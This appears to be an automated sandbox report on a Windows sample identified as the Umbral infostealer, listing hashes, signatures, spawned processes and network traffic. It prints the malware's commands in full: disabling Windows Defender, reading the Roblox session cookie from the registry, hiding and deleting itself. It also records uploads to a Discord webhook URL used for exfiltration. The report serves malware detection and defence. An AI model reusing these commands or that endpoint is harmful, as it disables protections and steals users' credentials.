Analysis

  • max time kernel
    93s
  • max time network
    126s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240412-en
  • resource tags
    arch:x64, arch:x86, image:win10v2004-20240412-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    15/04/2024, 16:52 UTC

General

  • Target

    ClientBetaNew.exe

  • Size

    229KB

  • MD5

    e7fca17393a9f4cb9ccb2f65fc2bb214

  • SHA1

    cef26fa30e3f68d85ab923beecc0cd0dbfa2a720

  • SHA256

    499282fecf90d5dcdf2b01ca4413c37477ec17b6068b43300dfeaefa1fb50978

  • SHA512

    303fe673e0d12410010971fb15ae58751948a7e0fb559e97acf5c73df0a7987dc8d423d59ebdfdfee79ef2696795ecf78543dcb74bebf6073a65229a2d24b80a

  • SSDEEP

    6144:9loZM+rIkd8g+EtXHkv/iD4rzQumkrHM99YW3X2gyb8e1mtzi:foZtL+EP8rzQumkrHM99YW3X23Ie

Score
10/10

Malware Config

Signatures

  • Detect Umbral payload 1 IoCs
  • Umbral

    Umbral stealer is an open-source modular stealer written in C#.

  • Drops file in Drivers directory 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 11 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 26 IoCs
  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\ClientBetaNew.exe
    "C:\Users\Admin\AppData\Local\Temp\ClientBetaNew.exe"
    1⤵
    • Drops file in Drivers directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:876
    • C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" csproduct get uuid
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:2060
    • C:\Windows\SYSTEM32\attrib.exe
      "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\ClientBetaNew.exe"
      2⤵
      • Views/modifies file attributes
      PID:64
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\ClientBetaNew.exe'
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2576
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2932
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4728
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3908
    • C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" os get Caption
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:1472
    • C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" computersystem get totalphysicalmemory
      2⤵
      PID:3608
    • C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" csproduct get uuid
      2⤵
      PID:2056
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      PID:1664
    • C:\Windows\System32\Wbem\wmic.exe
      "wmic" path win32_VideoController get name
      2⤵
      • Detects videocard installed
      PID:4896
    • C:\Windows\SYSTEM32\cmd.exe
      "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\ClientBetaNew.exe" && pause
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:5000
      • C:\Windows\system32\PING.EXE
        ping localhost
        3⤵
        • Runs ping.exe
        PID:3432

Network

      • US
        DNS
        8.8.8.8.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        8.8.8.8.in-addr.arpa
        IN PTR
        Response
        8.8.8.8.in-addr.arpa
        IN PTR
        dns.google
      • US
        DNS
        gstatic.com
        ClientBetaNew.exe
        Remote address:
        8.8.8.8:53
        Request
        gstatic.com
        IN A
        Response
        gstatic.com
        IN A
        142.250.200.35
      • GB
        GET
        https://gstatic.com/generate_204
        ClientBetaNew.exe
        Remote address:
        142.250.200.35:443
        Request
        GET /generate_204 HTTP/1.1
        Host: gstatic.com
        Connection: Keep-Alive
        Response
        HTTP/1.1 204 No Content
        Content-Length: 0
        Cross-Origin-Resource-Policy: cross-origin
        Date: Mon, 15 Apr 2024 16:52:13 GMT
        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
      • US
        DNS
        ip-api.com
        ClientBetaNew.exe
        Remote address:
        8.8.8.8:53
        Request
        ip-api.com
        IN A
        Response
        ip-api.com
        IN A
        208.95.112.1
      • US
        GET
        http://ip-api.com/line/?fields=hosting
        ClientBetaNew.exe
        Remote address:
        208.95.112.1:80
        Request
        GET /line/?fields=hosting HTTP/1.1
        Host: ip-api.com
        Connection: Keep-Alive
        Response
        HTTP/1.1 200 OK
        Date: Mon, 15 Apr 2024 16:52:12 GMT
        Content-Type: text/plain; charset=utf-8
        Content-Length: 6
        Access-Control-Allow-Origin: *
        X-Ttl: 60
        X-Rl: 44
      • US
        DNS
        0.204.248.87.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        0.204.248.87.in-addr.arpa
        IN PTR
        Response
        0.204.248.87.in-addr.arpa
        IN PTR
        https-87-248-204-0.lhr.llnw.net
      • US
        DNS
        35.200.250.142.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        35.200.250.142.in-addr.arpa
        IN PTR
        Response
        35.200.250.142.in-addr.arpa
        IN PTR
        lhr48s30-in-f3.1e100.net
      • US
        DNS
        241.154.82.20.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        241.154.82.20.in-addr.arpa
        IN PTR
        Response
      • US
        DNS
        1.112.95.208.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        1.112.95.208.in-addr.arpa
        IN PTR
        Response
        1.112.95.208.in-addr.arpa
        IN PTR
        ip-api.com
      • US
        DNS
        g.bing.com
        Remote address:
        8.8.8.8:53
        Request
        g.bing.com
        IN A
        Response
        g.bing.com
        IN CNAME
        g-bing-com.dual-a-0034.a-msedge.net
        g-bing-com.dual-a-0034.a-msedge.net
        IN CNAME
        dual-a-0034.a-msedge.net
        dual-a-0034.a-msedge.net
        IN A
        204.79.197.237
        dual-a-0034.a-msedge.net
        IN A
        13.107.21.237
      • US
        GET
        https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=5591f9ab8c624fe38ddd6b9cdb8f6e49&localId=w:1720ED0A-1154-D0C6-8544-30A988F9A221&deviceId=6896199938575611&anid=
        Remote address:
        204.79.197.237:443
        Request
        GET /neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=5591f9ab8c624fe38ddd6b9cdb8f6e49&localId=w:1720ED0A-1154-D0C6-8544-30A988F9A221&deviceId=6896199938575611&anid= HTTP/2.0
        host: g.bing.com
        accept-encoding: gzip, deflate
        user-agent: WindowsShellClient/9.0.40929.0 (Windows)
        Response
        HTTP/2.0 204
        cache-control: no-cache, must-revalidate
        pragma: no-cache
        expires: Fri, 01 Jan 1990 00:00:00 GMT
        set-cookie: MUID=35D3A3B46C8D6F6C3706B7D66DAA6EC5; domain=.bing.com; expires=Sat, 10-May-2025 16:52:14 GMT; path=/; SameSite=None; Secure; Priority=High;
        strict-transport-security: max-age=31536000; includeSubDomains; preload
        access-control-allow-origin: *
        x-cache: CONFIG_NOCACHE
        accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
        x-msedge-ref: Ref A: 0A4D6107393C435B8E9CE21FFD07FB52 Ref B: LON04EDGE0710 Ref C: 2024-04-15T16:52:14Z
        date: Mon, 15 Apr 2024 16:52:14 GMT
      • US
        GET
        https://g.bing.com/neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=5591f9ab8c624fe38ddd6b9cdb8f6e49&localId=w:1720ED0A-1154-D0C6-8544-30A988F9A221&deviceId=6896199938575611&anid=
        Remote address:
        204.79.197.237:443
        Request
        GET /neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=5591f9ab8c624fe38ddd6b9cdb8f6e49&localId=w:1720ED0A-1154-D0C6-8544-30A988F9A221&deviceId=6896199938575611&anid= HTTP/2.0
        host: g.bing.com
        accept-encoding: gzip, deflate
        user-agent: WindowsShellClient/9.0.40929.0 (Windows)
        cookie: MUID=35D3A3B46C8D6F6C3706B7D66DAA6EC5
        Response
        HTTP/2.0 204
        cache-control: no-cache, must-revalidate
        pragma: no-cache
        expires: Fri, 01 Jan 1990 00:00:00 GMT
        set-cookie: MSPTC=91_4y10nvwmWCifV8o7e8W5zhbPMYNPzdfwc-_RNULM; domain=.bing.com; expires=Sat, 10-May-2025 16:52:15 GMT; path=/; Partitioned; secure; SameSite=None
        strict-transport-security: max-age=31536000; includeSubDomains; preload
        access-control-allow-origin: *
        x-cache: CONFIG_NOCACHE
        accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
        x-msedge-ref: Ref A: 1890690C319947EEBD9B99ACFDFB2996 Ref B: LON04EDGE0710 Ref C: 2024-04-15T16:52:15Z
        date: Mon, 15 Apr 2024 16:52:14 GMT
      • US
        GET
        https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=5591f9ab8c624fe38ddd6b9cdb8f6e49&localId=w:1720ED0A-1154-D0C6-8544-30A988F9A221&deviceId=6896199938575611&anid=
        Remote address:
        204.79.197.237:443
        Request
        GET /neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=5591f9ab8c624fe38ddd6b9cdb8f6e49&localId=w:1720ED0A-1154-D0C6-8544-30A988F9A221&deviceId=6896199938575611&anid= HTTP/2.0
        host: g.bing.com
        accept-encoding: gzip, deflate
        user-agent: WindowsShellClient/9.0.40929.0 (Windows)
        cookie: MUID=35D3A3B46C8D6F6C3706B7D66DAA6EC5; MSPTC=91_4y10nvwmWCifV8o7e8W5zhbPMYNPzdfwc-_RNULM
        Response
        HTTP/2.0 204
        cache-control: no-cache, must-revalidate
        pragma: no-cache
        expires: Fri, 01 Jan 1990 00:00:00 GMT
        strict-transport-security: max-age=31536000; includeSubDomains; preload
        access-control-allow-origin: *
        x-cache: CONFIG_NOCACHE
        accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
        x-msedge-ref: Ref A: B772E3DA9BD046B9B527AFDC4A44C603 Ref B: LON04EDGE0710 Ref C: 2024-04-15T16:52:15Z
        date: Mon, 15 Apr 2024 16:52:15 GMT
      • US
        DNS
        237.197.79.204.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        237.197.79.204.in-addr.arpa
        IN PTR
        Response
      • US
        DNS
        21.114.53.23.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        21.114.53.23.in-addr.arpa
        IN PTR
        Response
        21.114.53.23.in-addr.arpa
        IN PTR
        a23-53-114-21.deploy.static.akamaitechnologies.com
      • US
        DNS
        26.35.223.20.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        26.35.223.20.in-addr.arpa
        IN PTR
        Response
      • US
        GET
        http://ip-api.com/json/?fields=225545
        ClientBetaNew.exe
        Remote address:
        208.95.112.1:80
        Request
        GET /json/?fields=225545 HTTP/1.1
        Host: ip-api.com
        Response
        HTTP/1.1 200 OK
        Date: Mon, 15 Apr 2024 16:52:17 GMT
        Content-Type: application/json; charset=utf-8
        Content-Length: 164
        Access-Control-Allow-Origin: *
        X-Ttl: 54
        X-Rl: 41
      • NL
        GET
        https://www.bing.com/th?id=OADD2.10239368184744_14DPBWVU0KKOKDZ8E&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=48&h=48&dynsize=1&qlt=90
        Remote address:
        23.62.61.97:443
        Request
        GET /th?id=OADD2.10239368184744_14DPBWVU0KKOKDZ8E&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=48&h=48&dynsize=1&qlt=90 HTTP/2.0
        host: www.bing.com
        accept: */*
        cookie: MUID=35D3A3B46C8D6F6C3706B7D66DAA6EC5; MSPTC=91_4y10nvwmWCifV8o7e8W5zhbPMYNPzdfwc-_RNULM
        accept-encoding: gzip, deflate, br
        user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
        Response
        HTTP/2.0 200
        cache-control: public, max-age=2592000
        content-type: image/png
        access-control-allow-origin: *
        access-control-allow-headers: *
        access-control-allow-methods: GET, POST, OPTIONS
        timing-allow-origin: *
        report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}
        nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
        content-length: 5773
        date: Mon, 15 Apr 2024 16:52:19 GMT
        alt-svc: h3=":443"; ma=93600
        x-cdn-traceid: 0.5d3d3e17.1713199939.17b7183c
      • US
        DNS
        97.61.62.23.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        97.61.62.23.in-addr.arpa
        IN PTR
        Response
        97.61.62.23.in-addr.arpa
        IN PTR
        a23-62-61-97.deploy.static.akamaitechnologies.com
      • US
        DNS
        discord.com
        ClientBetaNew.exe
        Remote address:
        8.8.8.8:53
        Request
        discord.com
        IN A
        Response
        discord.com
        IN A
        162.159.135.232
        discord.com
        IN A
        162.159.128.233
        discord.com
        IN A
        162.159.138.232
        discord.com
        IN A
        162.159.136.232
        discord.com
        IN A
        162.159.137.232
      • US
        POST
        https://discord.com/api/webhooks/1228961158032261151/x5bALpkiKWNhez1S3tpx6EU3KWmw4QhC3ZYLfNmj5sJalr62XbwIXFICAAfVJYroxbhu
        ClientBetaNew.exe
        Remote address:
        162.159.135.232:443
        Request
        POST /api/webhooks/1228961158032261151/x5bALpkiKWNhez1S3tpx6EU3KWmw4QhC3ZYLfNmj5sJalr62XbwIXFICAAfVJYroxbhu HTTP/1.1
        Accept: application/json
        User-Agent: Opera/9.80 (Windows NT 6.1; YB/4.0.0) Presto/2.12.388 Version/12.17
        Content-Type: application/json; charset=utf-8
        Host: discord.com
        Content-Length: 926
        Expect: 100-continue
        Connection: Keep-Alive
        Response
        HTTP/1.1 404 Not Found
        Date: Mon, 15 Apr 2024 16:52:20 GMT
        Content-Type: application/json
        Content-Length: 45
        Connection: keep-alive
        set-cookie: __dcfduid=8666cb4afb4811eebc9f6aa757e85bfb; Expires=Sat, 14-Apr-2029 16:52:20 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
        strict-transport-security: max-age=31536000; includeSubDomains; preload
        x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
        x-ratelimit-limit: 5
        x-ratelimit-remaining: 4
        x-ratelimit-reset: 1713199942
        x-ratelimit-reset-after: 1
        via: 1.1 google
        alt-svc: h3=":443"; ma=86400
        CF-Cache-Status: DYNAMIC
        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Q%2BpP7FwKwWjiMOj2%2FLqMlBxrz4ohsRUThWuF%2BKquFLG%2BF6cXD4267IhIzBaGuP1yAuw%2BKe5zMmDTp1U4gT3b04ZApB5eV1edbq3n56meVxeUUIPGStTYmQvUPxJP"}],"group":"cf-nel","max_age":604800}
        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
        X-Content-Type-Options: nosniff
        Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
        Set-Cookie: __sdcfduid=8666cb4afb4811eebc9f6aa757e85bfbc788ee2d9c057dfa0882cc2a4c72ca417fbbea1a8c1103a0b8c517166e69987c; Expires=Sat, 14-Apr-2029 16:52:20 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
        Set-Cookie: __cfruid=282972795a385495bbf48d4a4007f0e14029134c-1713199940; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
        Set-Cookie: _cfuvid=EdW5NjypE_VP_3f85ToOmasWLRz7uFL2F1krYhTJ1DU-1713199940661-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
        Server: cloudflare
        CF-RAY: 874d720bfb5563e4-LHR
      • US
        POST
        https://discord.com/api/webhooks/1228961158032261151/x5bALpkiKWNhez1S3tpx6EU3KWmw4QhC3ZYLfNmj5sJalr62XbwIXFICAAfVJYroxbhu
        ClientBetaNew.exe
        Remote address:
        162.159.135.232:443
        Request
        POST /api/webhooks/1228961158032261151/x5bALpkiKWNhez1S3tpx6EU3KWmw4QhC3ZYLfNmj5sJalr62XbwIXFICAAfVJYroxbhu HTTP/1.1
        Accept: application/json
        User-Agent: Opera/9.80 (Windows NT 6.1; YB/4.0.0) Presto/2.12.388 Version/12.17
        Content-Type: multipart/form-data; boundary="2cdcdd5f-0d33-48ff-89e8-777ff963078a"
        Host: discord.com
        Cookie: __dcfduid=8666cb4afb4811eebc9f6aa757e85bfb; __sdcfduid=8666cb4afb4811eebc9f6aa757e85bfbc788ee2d9c057dfa0882cc2a4c72ca417fbbea1a8c1103a0b8c517166e69987c; __cfruid=282972795a385495bbf48d4a4007f0e14029134c-1713199940; _cfuvid=EdW5NjypE_VP_3f85ToOmasWLRz7uFL2F1krYhTJ1DU-1713199940661-0.0.1.1-604800000
        Content-Length: 431741
        Expect: 100-continue
        Response
        HTTP/1.1 404 Not Found
        Date: Mon, 15 Apr 2024 16:52:21 GMT
        Content-Type: application/json
        Content-Length: 45
        Connection: keep-alive
        strict-transport-security: max-age=31536000; includeSubDomains; preload
        x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
        x-ratelimit-limit: 5
        x-ratelimit-remaining: 4
        x-ratelimit-reset: 1713199942
        x-ratelimit-reset-after: 1
        via: 1.1 google
        alt-svc: h3=":443"; ma=86400
        CF-Cache-Status: DYNAMIC
        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3SshqaWBvY4qbIB4ovh0E1sJsGSJGyCG0P9HUalCKuGpRlcvA6qjGrO2WSbrQPsjbb%2FlmEHINXeC9CVJc5e8QEy95c3u4T5wF%2FBpnMwi4%2F%2BUjuSiZXG5IRxlIHgW"}],"group":"cf-nel","max_age":604800}
        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
        X-Content-Type-Options: nosniff
        Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
        Server: cloudflare
        CF-RAY: 874d720d6d5663e4-LHR
      • US
        DNS
        232.135.159.162.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        232.135.159.162.in-addr.arpa
        IN PTR
        Response
      • US
        DNS
        50.23.12.20.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        50.23.12.20.in-addr.arpa
        IN PTR
        Response
      • US
        DNS
        18.31.95.13.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        18.31.95.13.in-addr.arpa
        IN PTR
        Response
      • US
        DNS
        240.221.184.93.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        240.221.184.93.in-addr.arpa
        IN PTR
        Response
      • US
        DNS
        0.205.248.87.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        0.205.248.87.in-addr.arpa
        IN PTR
        Response
        0.205.248.87.in-addr.arpa
        IN PTR
        https-87-248-205-0.lgw.llnw.net
      • US
        DNS
        91.90.14.23.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        91.90.14.23.in-addr.arpa
        IN PTR
        Response
        91.90.14.23.in-addr.arpa
        IN PTR
        a23-14-90-91.deploy.static.akamaitechnologies.com
      • US
        DNS
        48.229.111.52.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        48.229.111.52.in-addr.arpa
        IN PTR
        Response
      • 142.250.200.35:443
        https://gstatic.com/generate_204
        tls, http
        ClientBetaNew.exe
        770 B
        5.1kB
        9
        9

        HTTP Request

        GET https://gstatic.com/generate_204

        HTTP Response

        204
      • 208.95.112.1:80
        http://ip-api.com/line/?fields=hosting
        http
        ClientBetaNew.exe
        310 B
        267 B
        5
        2

        HTTP Request

        GET http://ip-api.com/line/?fields=hosting

        HTTP Response

        200
      • 204.79.197.237:443
        https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=5591f9ab8c624fe38ddd6b9cdb8f6e49&localId=w:1720ED0A-1154-D0C6-8544-30A988F9A221&deviceId=6896199938575611&anid=
        tls, http2
        2.0kB
        9.3kB
        22
        20

        HTTP Request

        GET https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=5591f9ab8c624fe38ddd6b9cdb8f6e49&localId=w:1720ED0A-1154-D0C6-8544-30A988F9A221&deviceId=6896199938575611&anid=

        HTTP Response

        204

        HTTP Request

        GET https://g.bing.com/neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=5591f9ab8c624fe38ddd6b9cdb8f6e49&localId=w:1720ED0A-1154-D0C6-8544-30A988F9A221&deviceId=6896199938575611&anid=

        HTTP Response

        204

        HTTP Request

        GET https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=5591f9ab8c624fe38ddd6b9cdb8f6e49&localId=w:1720ED0A-1154-D0C6-8544-30A988F9A221&deviceId=6896199938575611&anid=

        HTTP Response

        204
      • 208.95.112.1:80
        http://ip-api.com/json/?fields=225545
        http
        ClientBetaNew.exe
        285 B
        513 B
        5
        4

        HTTP Request

        GET http://ip-api.com/json/?fields=225545

        HTTP Response

        200
      • 23.62.61.97:443
        https://www.bing.com/th?id=OADD2.10239368184744_14DPBWVU0KKOKDZ8E&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=48&h=48&dynsize=1&qlt=90
        tls, http2
        1.7kB
        11.1kB
        20
        15

        HTTP Request

        GET https://www.bing.com/th?id=OADD2.10239368184744_14DPBWVU0KKOKDZ8E&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=48&h=48&dynsize=1&qlt=90

        HTTP Response

        200
      • 162.159.135.232:443
        https://discord.com/api/webhooks/1228961158032261151/x5bALpkiKWNhez1S3tpx6EU3KWmw4QhC3ZYLfNmj5sJalr62XbwIXFICAAfVJYroxbhu
        tls, http
        ClientBetaNew.exe
        521.0kB
        11.6kB
        387
        139

        HTTP Request

        POST https://discord.com/api/webhooks/1228961158032261151/x5bALpkiKWNhez1S3tpx6EU3KWmw4QhC3ZYLfNmj5sJalr62XbwIXFICAAfVJYroxbhu

        HTTP Response

        404

        HTTP Request

        POST https://discord.com/api/webhooks/1228961158032261151/x5bALpkiKWNhez1S3tpx6EU3KWmw4QhC3ZYLfNmj5sJalr62XbwIXFICAAfVJYroxbhu

        HTTP Response

        404
      • 8.8.8.8:53
        8.8.8.8.in-addr.arpa
        dns
        66 B
        90 B
        1
        1

        DNS Request

        8.8.8.8.in-addr.arpa

      • 8.8.8.8:53
        gstatic.com
        dns
        ClientBetaNew.exe
        57 B
        73 B
        1
        1

        DNS Request

        gstatic.com

        DNS Response

        142.250.200.35

      • 8.8.8.8:53
        ip-api.com
        dns
        ClientBetaNew.exe
        56 B
        72 B
        1
        1

        DNS Request

        ip-api.com

        DNS Response

        208.95.112.1

      • 8.8.8.8:53
        0.204.248.87.in-addr.arpa
        dns
        71 B
        116 B
        1
        1

        DNS Request

        0.204.248.87.in-addr.arpa

      • 8.8.8.8:53
        35.200.250.142.in-addr.arpa
        dns
        73 B
        111 B
        1
        1

        DNS Request

        35.200.250.142.in-addr.arpa

      • 8.8.8.8:53
        241.154.82.20.in-addr.arpa
        dns
        72 B
        158 B
        1
        1

        DNS Request

        241.154.82.20.in-addr.arpa

      • 8.8.8.8:53
        1.112.95.208.in-addr.arpa
        dns
        71 B
        95 B
        1
        1

        DNS Request

        1.112.95.208.in-addr.arpa

      • 8.8.8.8:53
        g.bing.com
        dns
        56 B
        151 B
        1
        1

        DNS Request

        g.bing.com

        DNS Response

        204.79.197.237
        13.107.21.237

      • 8.8.8.8:53
        237.197.79.204.in-addr.arpa
        dns
        73 B
        143 B
        1
        1

        DNS Request

        237.197.79.204.in-addr.arpa

      • 8.8.8.8:53
        21.114.53.23.in-addr.arpa
        dns
        71 B
        135 B
        1
        1

        DNS Request

        21.114.53.23.in-addr.arpa

      • 8.8.8.8:53
        26.35.223.20.in-addr.arpa
        dns
        71 B
        157 B
        1
        1

        DNS Request

        26.35.223.20.in-addr.arpa

      • 8.8.8.8:53
        97.61.62.23.in-addr.arpa
        dns
        70 B
        133 B
        1
        1

        DNS Request

        97.61.62.23.in-addr.arpa

      • 8.8.8.8:53
        discord.com
        dns
        ClientBetaNew.exe
        57 B
        137 B
        1
        1

        DNS Request

        discord.com

        DNS Response

        162.159.135.232
        162.159.128.233
        162.159.138.232
        162.159.136.232
        162.159.137.232

      • 8.8.8.8:53
        232.135.159.162.in-addr.arpa
        dns
        74 B
        136 B
        1
        1

        DNS Request

        232.135.159.162.in-addr.arpa

      • 8.8.8.8:53
        50.23.12.20.in-addr.arpa
        dns
        70 B
        156 B
        1
        1

        DNS Request

        50.23.12.20.in-addr.arpa

      • 8.8.8.8:53
        18.31.95.13.in-addr.arpa
        dns
        70 B
        144 B
        1
        1

        DNS Request

        18.31.95.13.in-addr.arpa

      • 8.8.8.8:53
        240.221.184.93.in-addr.arpa
        dns
        73 B
        144 B
        1
        1

        DNS Request

        240.221.184.93.in-addr.arpa

      • 8.8.8.8:53
        0.205.248.87.in-addr.arpa
        dns
        71 B
        116 B
        1
        1

        DNS Request

        0.205.248.87.in-addr.arpa

      • 8.8.8.8:53
        91.90.14.23.in-addr.arpa
        dns
        70 B
        133 B
        1
        1

        DNS Request

        91.90.14.23.in-addr.arpa

      • 8.8.8.8:53
        48.229.111.52.in-addr.arpa
        dns
        72 B
        158 B
        1
        1

        DNS Request

        48.229.111.52.in-addr.arpa

MITRE ATT&CK Enterprise v15

Downloads

      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

        Filesize

        2KB

        MD5

        d85ba6ff808d9e5444a4b369f5bc2730

        SHA1

        31aa9d96590fff6981b315e0b391b575e4c0804a

        SHA256

        84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

        SHA512

        8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        1KB

        MD5

        2b177ee51274376214d9f897a4cb90d2

        SHA1

        6cd0e8f9d48257d5824b700d1d02f6fde583b41f

        SHA256

        55e37da08076fdb55cfcb3ba36bf305ab5a306734d6294280daa4c92481a5339

        SHA512

        5d40f255cea9bdcf2b9576f393ea9246cfba9b910b5960e74c4bf1fe1d2dd53108341d20baf8f963e839694a112a51df4a720c52039699c2c99b4f7cb915624e

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        944B

        MD5

        77d622bb1a5b250869a3238b9bc1402b

        SHA1

        d47f4003c2554b9dfc4c16f22460b331886b191b

        SHA256

        f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb

        SHA512

        d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        948B

        MD5

        966914e2e771de7a4a57a95b6ecfa8a9

        SHA1

        7a32282fd51dd032967ed4d9a40cc57e265aeff2

